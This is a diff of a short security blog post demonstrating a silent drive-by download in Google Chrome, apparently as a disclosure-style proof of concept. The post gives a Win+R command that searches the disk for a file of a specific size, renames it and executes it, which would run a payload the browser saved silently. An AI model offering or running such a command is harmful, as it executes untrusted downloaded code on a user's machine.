hexatomium/hexatomium-old.github.io/_posts/2016-03-24-chrome-wave-poc.md

 ---

-This demonstrates a fully silent drive-by download in Google Chrome - and will launch a demo PoC if you dare to paste this seemingly harmless command in a Win+R prompt:
+This demonstrates a fully silent drive-by download in Google Chrome - and will launch a demo PoC if this seemingly harmless command is entered in a **Win+R** prompt:

 <pre>
 cmd /c for /r %g in (*_*) do if %~zg==23456 copy /y "%g" "%g.log" & "%g.log"